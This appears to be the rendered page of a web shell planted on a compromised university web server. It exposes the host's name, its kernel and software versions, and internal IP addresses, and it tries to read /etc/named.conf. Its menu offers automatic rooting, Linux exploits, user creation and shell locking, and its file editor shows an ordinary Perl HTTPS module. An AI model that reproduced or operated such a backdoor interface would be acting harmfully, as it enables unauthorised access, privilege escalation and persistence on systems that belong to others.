Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
perl5 /
site_perl /
5.34.1 /
Net /
[ HOME SHELL ]
Name
Size
Permission
Action
HTTP
[ DIR ]
drwxr-xr-x
HTTP.pm
8.59
KB
-r--r--r--
HTTPS.pm
1.09
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : HTTPS.pm
package Net::HTTPS; # $Id: HTTPS.pm,v 1.3 2002/12/23 18:16:29 gisle Exp $ use strict; use vars qw($VERSION $SSL_SOCKET_CLASS @ISA); $VERSION = "1.00"; # Figure out which SSL implementation to use if ($IO::Socket::SSL::VERSION) { $SSL_SOCKET_CLASS = "IO::Socket::SSL"; # it was already loaded } else { eval { require Net::SSL; }; # from Crypt-SSLeay if ($@) { my $old_errsv = $@; eval { require IO::Socket::SSL; }; if ($@) { $old_errsv =~ s/\s\(\@INC contains:.*\)/)/g; die $old_errsv . $@; } $SSL_SOCKET_CLASS = "IO::Socket::SSL"; } else { $SSL_SOCKET_CLASS = "Net::SSL"; } } require Net::HTTP::Methods; @ISA=($SSL_SOCKET_CLASS, 'Net::HTTP::Methods'); sub configure { my($self, $cnf) = @_; $self->http_configure($cnf); } sub http_connect { my($self, $cnf) = @_; $self->SUPER::configure($cnf); } sub http_default_port { 443; } # The underlying SSLeay classes fails to work if the socket is # placed in non-blocking mode. This override of the blocking # method makes sure it stays the way it was created. sub blocking { } # noop 1;
Close